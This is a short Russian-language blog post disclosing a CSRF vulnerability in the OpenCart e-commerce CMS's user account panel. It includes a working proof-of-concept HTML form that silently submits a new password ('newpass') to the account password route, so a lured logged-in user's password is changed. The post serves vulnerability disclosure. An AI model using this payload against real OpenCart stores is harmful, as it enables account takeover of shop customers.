CSRF в панели пользователя Opencart

opencartOpenCart — это бесплатная CMS для организации интернет-магазина.

OpenCart не использует какой-либо защиты от CSRF в панели пользователя. Уязвимость присутствует вплоть до последней версии CMS.

Злоумышленник может отправить ссылку на специально сформированную страницу, что может привести к смене пароля пользователя:

<form action="http://localhost/index.php?route=account/password" method="post" enctype="multipart/form-data">
<div class="content">
<table class="form">
<tbody><tr>
<td><input name="password" value="newpass" type="hidden"></td>
</tr>
<tr>
<td><input name="confirm" value="newpass" type="hidden"></td>
</tr>
</tbody></table>
</div>
<div class="buttons">
<div class="right"><input value="Продолжить" class="button" type="submit"></div>
</div>
</form>
В рубрике: Уязвимости.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *